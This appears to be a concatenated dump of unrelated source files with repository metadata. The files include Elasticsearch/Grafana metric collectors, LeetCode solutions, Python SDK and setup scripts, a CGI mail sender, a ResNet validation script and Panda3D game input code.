"target_biz_id": biz_mapping[group["subscription_id"]]["bk_biz_id"],
"target_biz_name": self.get_biz_name(biz_mapping[group["subscription_id"]]["bk_biz_id"]),
"category_id": biz_mapping[group["subscription_id"]]["category_id"],
"collector_config_id": biz_mapping[group["subscription_id"]]["collector_config_id"],
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("index_set", _("索引集"))
def index_set(self):
groups = (
LogIndexSet.objects.values("project_id", "scenario_id").order_by().annotate(count=Count("index_set_id"))
)
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": self.project_biz_info[group["project_id"]]["bk_biz_id"],
"target_biz_name": self.project_biz_info[group["project_id"]]["bk_biz_name"],
"scenario_id": group["scenario_id"],
},
)
for group in groups
if self.project_biz_info.get(group["project_id"])
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("third_party_es", _("第三方ES"))
def third_party_es(self):
clusters = TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE, "no_request": True})
groups = defaultdict(int)
for cluster in clusters:
if cluster["cluster_config"]["registered_system"] == "_default":
continue
bk_biz_id = cluster["cluster_config"]["custom_option"]["bk_biz_id"]
if not bk_biz_id:
continue
groups[bk_biz_id] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in groups.items()
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("cluster_health", _("集群健康度"))
def cluster_health(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
health_data = es_client.cluster.health(params={"request_timeout": 10})
dimensions = {
"origin_cluster_name": health_data["cluster_name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in [
"number_of_nodes",
"number_of_data_nodes",
"active_primary_shards",
"active_shards",
"relocating_shards",
"initializing_shards",
"unassigned_shards",
"delayed_unassigned_shards",
"number_of_pending_tasks",
"number_of_in_flight_fetch",
"task_max_waiting_in_queue_millis",
"active_shards_percent_as_number",
]:
if key not in health_data:
continue
metrics.append(
Metric(
metric_name=key,
metric_value=health_data[key],
dimensions=dimensions,
)
)
# 状态字段需要单独处理
status_mapping = {
"green": 0,
"yellow": 1,
"red": 2,
}
metrics.append(
Metric(
metric_name="status",
metric_value=status_mapping[health_data["status"]],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_health metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("cluster_node", _("集群节点"))
def cluster_node(self):
metrics = []
for cluster_info in self.cluster_infos.values():
try:
es_client = self.get_es_client(cluster_info)
if not es_client:
continue
allocations = es_client.cat.allocation(format="json", bytes="mb", params={"request_timeout": 10})
for allocation in allocations:
if allocation["node"] == "UNASSIGNED":
# 未分配的节点忽略
continue
dimensions = {
"node_ip": allocation["ip"],
"node": allocation["node"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["shards", "disk.indices", "disk.used", "disk.avail", "disk.total", "disk.percent"]:
if key not in allocation:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=allocation[key],
dimensions=dimensions,
)
)
nodes = es_client.cat.nodes(format="json", params={"request_timeout": 10})
for node in nodes:
dimensions = {
"node_ip": node["ip"],
"node": node["name"],
"cluster_id": cluster_info.get("cluster_config").get("cluster_id"),
"cluster_name": cluster_info.get("cluster_config").get("cluster_name"),
}
for key in ["heap.percent", "ram.percent", "cpu", "load_1m", "load_5m", "load_15m"]:
if key not in node:
continue
metrics.append(
Metric(
metric_name=key.replace(".", "_"),
metric_value=node[key],
dimensions=dimensions,
)
)
except Exception as e: # pylint: disable=broad-except
logger.exception("fail to collect cluster_node metric for cluster->{}, {}".format(cluster_info, e))
return metrics
@register_metric("grafana_dashboard", _("Grafana 仪表盘"), cache_time=60 * 60)
def grafana_dashboard(self):
metrics = []
all_organization = grafana_client.get_all_organization().json()
for org in all_organization:
org_name = org["name"]
if not org_name.isdigit():
continue
if int(org_name) not in self.biz_info:
continue
dashboards = grafana_client.search_dashboard(org_id=org["id"]).json()
metrics.append(
Metric(
metric_name="count",
metric_value=len(dashboards),
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
panel_count = 0
for dashboard in dashboards:
dashboard_info = (
grafana_client.get_dashboard_by_uid(org_id=org["id"], dashboard_uid=dashboard["uid"])
.json()
.get("dashboard", {})
)
for panel in dashboard_info.get("panels", []):
if panel["type"] == "row":
# 如果是行类型,需要统计嵌套数量
panel_count += len(panel.get("panels", []))
else:
panel_count += 1
metrics.append(
Metric(
metric_name="panel_count",
metric_value=panel_count,
dimensions={"target_biz_id": int(org_name), "target_biz_name": self.get_biz_name(org_name)},
)
)
return metrics
@register_metric("log_extract_strategy", _("日志提取策略"))
def log_extract_strategy(self):
from apps.log_extract.models import Strategies
groups = Strategies.objects.all().values("bk_biz_id").order_by().annotate(count=Count("strategy_id"))
metrics = [
Metric(
metric_name="count",
metric_value=group["count"],
dimensions={
"target_biz_id": group["bk_biz_id"],
"target_biz_name": self.get_biz_name(group["bk_biz_id"]),
},
)
for group in groups
]
metrics = self.append_total_metric(metrics)
return metrics
@register_metric("log_extract_task", _("日志提取任务"))
def log_extract_task(self):
from apps.log_extract.models import Tasks
groups = Tasks.objects.all().values("bk_biz_id", "created_by").order_by().annotate(count=Count("task_id"))
# 每个业务的任务数
biz_count_groups = defaultdict(int)
# 每个业务的用户数
user_count_groups = defaultdict(int)
for group in groups:
biz_count_groups[group["bk_biz_id"]] += group["count"]
user_count_groups[group["bk_biz_id"]] += 1
metrics = [
Metric(
metric_name="count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in biz_count_groups.items()
]
metrics = self.append_total_metric(metrics)
metrics += [
Metric(
metric_name="user_count",
metric_value=count,
dimensions={"target_biz_id": bk_biz_id, "target_biz_name": self.get_biz_name(bk_biz_id)},
)
for bk_biz_id, count in user_count_groups.items()
]
return metrics
| [
"[email protected]"
] | |
025de780542a4de0d528fb37ec990d44996cca19 | fa571a842f04bcbc77ff203a5ed6f6ee776eed6d | /keywords/codes/defkeyword.py | ee484d5db4128adb54ec86a4adb8116bafe3b444 | [] | no_license | krishna-rawat-hp/PythonProgramming | b25c0916475724e6d2de4b7d59cf40b5b5e8330b | d24df17ca6aff9271c44ef8c73b80c00cd065ded | refs/heads/master | 2023-03-11T19:24:34.529059 | 2021-02-27T14:09:22 | 2021-02-27T14:09:22 | 282,611,873 | 0 | 0 | null | 2020-07-26T10:38:54 | 2020-07-26T08:52:49 | null | UTF-8 | Python | false | false | 93 | py | def my_func(a,b): # def is used to define a function
c = a+b
print(c)
my_func(15,35)
| [
"[email protected]"
] | |
7cf821bf15a32a637688390b90127482667b71d9 | fe6eaa2f3656dedcb2c1e937cc1363d19a0d3ec1 | /leetcode_python/231.power-of-two.py | 6c402eec05c33366e999760635c0f1d508c79f71 | [] | no_license | toyijiu/my_code | 4619ac6bc06c5032e01d5c215dbae516bbc4fe77 | dd163cc47e2c706504aba1d42322167fb93dd9e9 | refs/heads/master | 2020-08-31T14:49:18.188393 | 2019-11-27T08:57:55 | 2019-11-27T08:57:55 | 218,714,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #
# @lc app=leetcode id=231 lang=python3
#
# [231] Power of Two
#
# https://leetcode.com/problems/power-of-two/description/
#
# algorithms
# Easy (41.63%)
# Total Accepted: 213.5K
# Total Submissions: 512.8K
# Testcase Example: '1'
#
# Given an integer, write a function to determine if it is a power of two.
#
# Example 1:
#
#
# Input: 1
# Output: true
# Explanation: 20 = 1
#
#
# Example 2:
#
#
# Input: 16
# Output: true
# Explanation: 24 = 16
#
# Example 3:
#
#
# Input: 218
# Output: false
#
#
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
#通常的办法是递归判断是否能被整除2然后递归除以2
#但其实这个 数的最高bit为1,后面的为0就行
if n < 1:
return False
while n > 1:
if n % 2:
return False
n /= 2
return n == 1
| [
"[email protected]"
] | |
7d31cb5286fe189f97049fbbe823e25ef89ce2d5 | 7a596dc0e121054fe5f05fae6c78774a57cf94ac | /setup.py | c6a683babc0762c4c1be30bfcd7d184061c327bb | [
"MIT"
] | permissive | nhoffman/swarmwrapper | 8fffae5ed5824313f054fd7edb1ed2d3897b9c02 | b62f955f843c76c4696320e2b2a14ce2b80e1807 | refs/heads/master | 2021-01-17T07:20:15.826516 | 2018-03-14T18:21:32 | 2018-03-14T18:21:32 | 42,473,732 | 3 | 1 | null | 2016-06-07T18:33:22 | 2015-09-14T20:00:11 | Python | UTF-8 | Python | false | false | 1,038 | py | import os
import subprocess
from setuptools import setup, find_packages
subprocess.call(
('mkdir -p swarmwrapper/data && '
'git describe --tags --dirty > swarmwrapper/data/ver.tmp'
'&& mv swarmwrapper/data/ver.tmp swarmwrapper/data/ver '
'|| rm -f swarmwrapper/data/ver.tmp'),
shell=True, stderr=open(os.devnull, "w"))
from swarmwrapper.swarmwrapper import __version__
setup(
author='Noah Hoffman',
author_email='[email protected]',
description='wrapper for using swarm with pplacer',
url='https://github.com/nhoffman/swarmwrapper',
name='swarmwrapper',
packages=find_packages(),
package_dir={'swarmwrapper': 'swarmwrapper'},
package_data={'swarmwrapper': ['data/ver']},
entry_points={'console_scripts': ['swarmwrapper = swarmwrapper.swarmwrapper:main']},
version=__version__,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: POSIX',
'Programming Language :: Python :: 2.7',
],
)
| [
"[email protected]"
] | |
f6b85844ae241476a94fc75c33793cf360b02aa6 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/batch_set_objects_response.py | 1e18f86df848790e44e33d3a24e185439a9fa96c | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,672 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class BatchSetObjectsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'all_counts': 'int',
'results': 'list[DatabaseObjectResp]'
}
attribute_map = {
'all_counts': 'all_counts',
'results': 'results'
}
def __init__(self, all_counts=None, results=None):
"""BatchSetObjectsResponse - a model defined in huaweicloud sdk"""
super(BatchSetObjectsResponse, self).__init__()
self._all_counts = None
self._results = None
self.discriminator = None
if all_counts is not None:
self.all_counts = all_counts
if results is not None:
self.results = results
@property
def all_counts(self):
"""Gets the all_counts of this BatchSetObjectsResponse.
总数
:return: The all_counts of this BatchSetObjectsResponse.
:rtype: int
"""
return self._all_counts
@all_counts.setter
def all_counts(self, all_counts):
"""Sets the all_counts of this BatchSetObjectsResponse.
总数
:param all_counts: The all_counts of this BatchSetObjectsResponse.
:type: int
"""
self._all_counts = all_counts
@property
def results(self):
"""Gets the results of this BatchSetObjectsResponse.
批量对象选择响应列表
:return: The results of this BatchSetObjectsResponse.
:rtype: list[DatabaseObjectResp]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this BatchSetObjectsResponse.
批量对象选择响应列表
:param results: The results of this BatchSetObjectsResponse.
:type: list[DatabaseObjectResp]
"""
self._results = results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BatchSetObjectsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
556cc3314b023aaab5a462d23db49fc1d46593c8 | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /MyCircularQueue.py | cc36333e54e793ae307e426135a9c5b28f28d8dd | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | class Node:
def __init__(self, val):
self.val = val
self.next = None
class MyCircularQueue:
def __init__(self, k: int):
self.size = k
self.front = Node(-1)
p = self.front
for i in range(k):
p.next = Node(-1)
p = p.next
p.next = self.front
self.rear = p
self.c = 0
def enQueue(self, value: int) -> bool:
if self.c == self.size:
return False
self.c += 1
self.rear = self.rear.next
self.rear.val = value
return True
def deQueue(self) -> bool:
if self.c == 0:
return False
self.c -= 1
self.front = self.front.next
return True
def Front(self) -> int:
if self.c == 0:
return -1
return self.front.val
def Rear(self) -> int:
if self.c == 0:
return -1
return self.rear.val
def isEmpty(self) -> bool:
return self.c == 0
def isFull(self) -> bool:
return self.c == self.size
m = MyCircularQueue(3)
m.enQueue(1)
m.enQueue(2)
m.enQueue(3)
m.enQueue(4)
print(m.Rear())
| [
"[email protected]"
] | |
0d9157411e4013eb8d23e1592693f64f4d2340c9 | 282e6905cbcdc7795f5bd145f5310d4eef4d199d | /Dog Walking/Python-Solution.py | a3e0fd05d8058ce6172de8cfe0c2f836dd633d76 | [] | no_license | Lizonghang/IEEEX | d9e41d7ba00dc73706afe4ae8aca9dae2d10ee37 | 8e5998820f9e0ba600e1b3f0366981f30e391ae1 | refs/heads/master | 2021-07-15T00:37:39.099411 | 2017-10-17T09:42:24 | 2017-10-17T09:42:24 | 105,604,511 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
T = input()
for t in xrange(T):
N, K = map(int, raw_input().strip().split())
w = []
for i in xrange(N):
w.append(int(input()))
w.sort()
d = []
for i in xrange(1, N):
d.append(w[i] - w[i - 1])
d.sort()
print sum(d[:N-K]) | [
"[email protected]"
] | |
862c4269fd260804df4f1319bae80e4d6604e0b0 | d48ddc1e4c4b1e379ed1c1971c84aa3c104edff2 | /pymachinetalk/application/constants.py | 1ab9e927720c09d627c62449d2566163a69b1225 | [
"MIT"
] | permissive | machinekit/pymachinetalk | 1b66e472f364c2d3fe6206823d6a50e41effce9e | be4bffd011ea76039407f043553552b8a0b69f2d | refs/heads/master | 2021-01-12T19:19:52.051968 | 2020-09-22T19:40:52 | 2020-09-22T19:40:52 | 44,979,021 | 6 | 7 | MIT | 2020-09-22T19:40:54 | 2015-10-26T15:47:57 | Python | UTF-8 | Python | false | false | 1,505 | py | # coding=utf-8
# protobuf
import machinetalk.protobuf.types_pb2 as types
import machinetalk.protobuf.motcmds_pb2 as motcmds
# noinspection PyUnresolvedReferences
from machinetalk.protobuf.status_pb2 import *
ORIGIN_G54 = types.ORIGIN_G54
ORIGIN_G55 = types.ORIGIN_G55
ORIGIN_G56 = types.ORIGIN_G56
ORIGIN_G57 = types.ORIGIN_G57
ORIGIN_G58 = types.ORIGIN_G58
ORIGIN_G59 = types.ORIGIN_G59
ORIGIN_G59_1 = types.ORIGIN_G59_1
ORIGIN_G59_2 = types.ORIGIN_G59_2
ORIGIN_G59_3 = types.ORIGIN_G59_2
MOTION_UNINITIALIZED = types.UNINITIALIZED_STATUS
MOTION_DONE = types.RCS_DONE
MOTION_EXEC = types.RCS_EXEC
MOTION_ERROR = types.RCS_ERROR
MOTION_RECEIVED = types.RCS_RECEIVED
MOTION_TYPE_NONE = motcmds._EMC_MOTION_TYPE_NONE
MOTION_TYPE_TRAVERSE = motcmds._EMC_MOTION_TYPE_TRAVERSE
MOTION_TYPE_FEED = motcmds._EMC_MOTION_TYPE_FEED
MOTION_TYPE_ARC = motcmds._EMC_MOTION_TYPE_ARC
MOTION_TYPE_TOOLCHANGEE = motcmds._EMC_MOTION_TYPE_TOOLCHANGE
MOTION_TYPE_PROBING = motcmds._EMC_MOTION_TYPE_PROBING
MOTION_TYPE_INDEXROTARY = motcmds._EMC_MOTION_TYPE_INDEXROTARY
RELEASE_BRAKE = 0
ENGAGE_BRAKE = 1
JOG_STOP = 0
JOG_CONTINUOUS = 1
JOG_INCREMENT = 2
SPINDLE_FORWARD = 0
SPINDLE_REVERSE = 1
SPINDLE_OFF = 2
SPINDLE_DECREASE = 3
SPINDLE_INCREASE = 4
SPINDLE_CONSTANT = 5
NML_ERROR = types.MT_EMC_NML_ERROR
NML_TEXT = types.MT_EMC_NML_TEXT
NML_DISPLAY = types.MT_EMC_NML_DISPLAY
OPERATOR_ERROR = types.MT_EMC_OPERATOR_ERROR
OPERATOR_TEXT = types.MT_EMC_OPERATOR_TEXT
OPERATOR_DISPLAY = types.MT_EMC_OPERATOR_DISPLAY
| [
"[email protected]"
] | |
bced46d25207d88a5d9ef827366a418030296c94 | 4e62fcb385d9e8a6af0c6c9ec315f803d6ea190b | /testsuite/modulegraph-dir/trivial-script | f52375825ebb81241b0cf11123498021f581e29b | [
"MIT"
] | permissive | ronaldoussoren/modulegraph2 | 8d8a18b472574acc158c5c293ae4ed7b88f06ba9 | 227954f5037e291edc91e666f21bda44fd66fcb2 | refs/heads/master | 2023-09-01T05:16:44.873049 | 2023-04-09T10:28:19 | 2023-04-09T10:28:19 | 231,953,118 | 12 | 7 | MIT | 2023-04-09T10:29:06 | 2020-01-05T17:36:35 | C | UTF-8 | Python | false | false | 98 | #!/usr/bin/env python3
print("What is your name?")
name = input()
print("Hello {}".format(name))
| [
"[email protected]"
] | ||
ca7dc3b58354ec5f7b8177aa40ae4f2f1c8c1694 | 242086b8c6a39cbc7af3bd7f2fd9b78a66567024 | /python/PP4E-Examples-1.4/Examples/PP4E/Internet/Web/dev/PyMailCGI_2.1/cgi-bin/onEditPageSend.py | aaeda84076959bbddb4003c8c1a90814ed51323b | [] | no_license | chuzui/algorithm | 7537d0aa051ac4cbe9f6a7ca9a3037204803a650 | c3006b24c4896c1242d3ceab43ace995c94f10c8 | refs/heads/master | 2021-01-10T13:05:30.902020 | 2015-09-27T14:39:02 | 2015-09-27T14:39:02 | 8,404,397 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,772 | py | #!/usr/bin/python
###############################################################
# On submit in edit window--finish a write, reply, or forward;
# in 2.0, we reuse the send tools in mailtools to construct
# and send the message, instead of older manual string scheme;
# we also now inherit attachment composition from that module;
###############################################################
import cgi, sys, commonhtml, os
from externs import mailtools
def saveAttachments(form, maxattach=3, savedir='partsupload'):
"""
save uploaded attach files in local files on
server from which mailtools will add to mail
"""
partnames = []
for i in range(1, maxattach+1):
fieldname = 'attach%d' % i
if form.has_key(fieldname) and form[fieldname].filename:
fileinfo = form[fieldname] # sent and filled?
filedata = fileinfo.value # read into string
filename = fileinfo.filename # client's path name
if '\\' in filename:
basename = filename.split('\\')[-1] # try dos clients
elif '/' in filename:
basename = filename.split('/')[-1] # try unix clients
else:
basename = filename # assume dir stripped
pathname = os.path.join(savedir, basename)
open(pathname, 'wb').write(filedata)
os.chmod(pathname, 0666) # need for some srvrs
partnames.append(pathname) # list of local paths
return partnames # gets type from name
#commonhtml.dumpstatepage(0)
form = cgi.FieldStorage() # parse form input data
attaches = saveAttachments(form) # cgi.print_form(form) to see
# server name from module or get-style url
smtpservername = commonhtml.getstandardsmtpfields(form)
# parms assumed to be in form or url here
from commonhtml import getfield # fetch value attributes
From = getfield(form, 'From') # empty fields may not be sent
To = getfield(form, 'To')
Cc = getfield(form, 'Cc')
Subj = getfield(form, 'Subject')
text = getfield(form, 'text')
if Cc == '?': Cc = ''
# tools reused from PyMailGUI
Tos = [addr.strip() for addr in To.split(';')] # multiple recip lists
Ccs = (Cc and [addr.strip() for addr in Cc.split(';')]) or ''
extraHdrs = [('Cc', Ccs), ('X-Mailer', 'PyMailCGI2')]
sender = mailtools.SilentMailSender(smtpservername)
try:
sender.sendMessage(From, Tos, Subj, extraHdrs, text, attaches)
except:
commonhtml.errorpage('Send mail error')
else:
commonhtml.confirmationpage('Send mail')
| [
"zui"
] | zui |
ae9e86029763d737b183b2caf5231f0d4f50921d | 11211916f39b9d98027b64d778e52743d0c519a1 | /L3/doc/assignments/download/code/tmp/mindmap.py | 79dfe6970ede18578894c3180bb23a782b56c190 | [] | no_license | mantasruigys3000/Group-Task | 87baf1bc2747323c0508f6f32ef733c3f4b50978 | 6790d74ae7fa0fe6b13733efcd75a9f4aca70ab0 | refs/heads/master | 2020-04-23T20:54:09.696659 | 2019-02-22T01:29:53 | 2019-02-22T01:29:53 | 171,454,102 | 0 | 0 | null | 2019-02-19T10:31:09 | 2019-02-19T10:31:08 | null | UTF-8 | Python | false | false | 113 | py | Ipsum sed tempora magnam quisquam porro tempora.
Username: Sid
Password: bungle
Quiquia modi sit dolore quiquia.
| [
"[email protected]"
] | |
cf48693e97cb38f9ccb91a41e55b51a294037776 | 7cf119239091001cbe687f73018dc6a58b5b1333 | /datashufflepy-zeus/src/branch_scripts2/NEWS/ZX_CJXW_ZYCJ/ZX_CJXW_ZYCJ_BQW_YW.py | ba8ecd5014776a7fa8dbfac0a2059a57780b2dab | [
"Apache-2.0"
] | permissive | ILKKAI/dataETL | 0f5b80c3482994f735f092a1e01fa1009bac4109 | 32f7ec3aaaf32b5074536a615cb9cd5c28bd499c | refs/heads/master | 2022-04-04T19:27:05.747852 | 2020-02-28T11:17:48 | 2020-02-28T11:17:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | # -*- coding: utf-8 -*-
from database._mongodb import MongoClient
def data_shuffle(data):
return data
if __name__ == '__main__':
main_mongo = MongoClient(entity_code="ZX_CJXW_ZYCJ_BQW_YW", mongo_collection="ZX_CJXW_ZYCJ")
data_list = main_mongo.main()
for data in data_list:
re_data = data_shuffle(data)
print(re_data)
| [
"[email protected]"
] | |
92f76a6b89288b8b5be0af93b98b5c77b5bd1dad | b88ec36f31099bad6e6e647d2ea58c9ae9431368 | /manage.py | 3303836579406baa22be1d625ba3c1c0b62c1594 | [] | no_license | crowdbotics-apps/golfworld2020-21545 | 6365f3d3c057b0f664c57bf1e4ddc511429b02e8 | c4b0cfc85e1488792de4274c25c6f86b10558d73 | refs/heads/master | 2023-01-03T08:59:19.955215 | 2020-10-15T20:32:40 | 2020-10-15T20:32:40 | 304,441,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'golfworld2020_21545.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
599b2f6f2bda0dc8ed7f1276ca0b9a3c34c3d5df | 200a7e17f51f7a2b959e6b0313b76effd9edb2ea | /image_classification/valid_resnet152.py | 2f26314780c2291382dd4996d630e4bf1bb0bec8 | [
"Apache-2.0",
"MIT"
] | permissive | ZhiangChen/tornado_ML | 43f243c0e8371830a104afa5b177deebfc14440d | d8bded61a6a234ca67e31776bc8576c6c18f5621 | refs/heads/main | 2023-04-29T04:40:05.850645 | 2021-05-20T04:50:32 | 2021-05-20T04:50:32 | 358,980,904 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,370 | py | """
training.py
Zhiang Chen, April 2020
"""
import torch
import torch.utils.data
import torchvision.datasets
import torch.nn as nn
import torchvision.transforms as transforms
from utils import *
import torchvision.models as models
from data import EurekaDataset
import os
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
torch.manual_seed(0)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
eureka_normalize = transforms.Normalize(mean=[0.44, 0.50, 0.43],
std=[0.26, 0.25, 0.26])
eureka_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
eureka_normalize,])
train_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,])
test_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.ToTensor(),
normalize,])
def neural_network(architecture, nm_classes, pretrained=True, change_last_layer=True):
assert architecture in model_names
print("=> creating model '{}'".format(architecture))
model = models.__dict__[architecture](pretrained=pretrained)
if change_last_layer:
if architecture.startswith('densenet'):
in_features = model.classifier.in_features
model.classifier = nn.Linear(in_features=in_features, out_features=nm_classes)
else:
in_features = model.fc.in_features
model.fc = nn.Linear(in_features=in_features, out_features=nm_classes)
return model
def cifar10(root='./datasets/cifar10/', val=True):
train = torchvision.datasets.CIFAR10(root, train=True, download=True, transform=train_transform)
test = torchvision.datasets.CIFAR10(root, train=False, download=True, transform=test_transform)
"""
if val:
indices = torch.randperm(len(train)).tolist()
train_set = torch.utils.data.Subset(train, indices[:-10000])
val_set = torch.utils.data.Subset(train, indices[-10000:])
return train_set, val_set, test
"""
return train, test
def eureka():
train = EurekaDataset('./datasets/Eureka/images/','./datasets/Eureka/class.json', eureka_transform)
test = EurekaDataset('./datasets/Eureka/images_test/','./datasets/Eureka/class.json', eureka_transform)
test.addJson('./datasets/Eureka/label_102.json')
return train, test
if __name__ == '__main__':
cuda = 'cuda:0'
device = torch.device(cuda)
nm_classes = 3
train_dataset, test_dataset = eureka()
train_dataloader = torch.utils.data.DataLoader(
train_dataset, batch_size=4, shuffle=True, num_workers=8, collate_fn=collate_fn)
test_dataloader = torch.utils.data.DataLoader(
test_dataset, batch_size=4, shuffle=True, num_workers=8, collate_fn=collate_fn)
model = neural_network('resnet152', nm_classes)
#if you want to load weight
#model.load_state_dict(torch.load("trained_param_eureka_cls/epoch_0002.param"))
#model.eval()
model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=0.001, momentum=0.9, weight_decay=0.00001)
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.65)
#init_epoch = 0
#num_epochs = 60
#print_freq = 100
#save_param = "trained_param3_resnext101/epoch_{:04d}.param".format(init_epoch)
#torch.save(model.state_dict(), save_param)
weight_path = "trained_param_resnet152"
weights = [f for f in os.listdir(weight_path) if f.endswith(".param")]
weights.sort()
for w in weights:
weight_name = os.path.join(weight_path, w)
#save_param = "trained_param3_resnext101/epoch_{:04d}.param".format(epoch)
#train(train_dataloader, model, criterion, optimizer, epoch, device, print_freq)
#lr_scheduler.step()
print(weight_name)
model.load_state_dict(torch.load(weight_name))
validate(test_dataloader, model, criterion, device)
#acc = test(model, test_dataset, device)
#print("acc: %f" % acc)
#torch.save(model.state_dict(), save_param)
| [
"[email protected]"
] | |
71f6171f7aaed83d059577c3d31fc17bf81f12e2 | 2a4a17a67b9069c19396c0f8eabc8b7c4b6ff703 | /BGP3D/Chapter10/Examples/InputManagerClass_01.py | 692c2663e7045b2d047b6e25f1ff8cc495719df4 | [] | no_license | kaz101/panda-book | 0fa273cc2df5849507ecc949b4dde626241ffa5e | 859a759c769d9c2db0d11140b0d04506611c2b7b | refs/heads/master | 2022-12-19T09:36:05.794731 | 2020-09-16T19:04:10 | 2020-09-16T19:04:10 | 295,784,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,187 | py | ''' InputManager Class
The purpose of this class is to have an object
that will record user input and retain that
information for use by other classes.
'''
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
class InputManager(DirectObject):
def __init__(self):
self.keyMap = {"up" : False,
"down" : False,
"left" : False,
"right" : False,
"fire" : False,
"mouse1" : False,
"mouse3" : False}
# Creates a key map to store the state of relevant keyboard keys.
self.accept("w", self.setKey, ["up", True])
self.accept("s", self.setKey, ["down", True])
self.accept("a", self.setKey, ["left", True])
self.accept("d", self.setKey, ["right", True])
self.accept("enter", self.setKey, ["fire", True])
self.accept("mouse1", self.setKey, ["mouse1", True])
self.accept("mouse3", self.setKey, ["mouse3", True])
# Registers the events for key and mouse presses and
# connects them to the setKey method.
self.accept("w-up", self.setKey, ["up", False])
self.accept("s-up", self.setKey, ["down", False])
self.accept("a-up", self.setKey, ["left", False])
self.accept("d-up", self.setKey, ["right", False])
self.accept("enter-up", self.setKey, ["fire", False])
self.accept("mouse1-up", self.setKey, ["mouse1", False])
self.accept("mouse3-up", self.setKey, ["mouse3", False])
# Registers the events for key and mouse releases and
# connects them to the setKey method.
self.setupMouseAim()
# creates the collision objects used for aiming with the mouse.
def setKey(self, key, value):
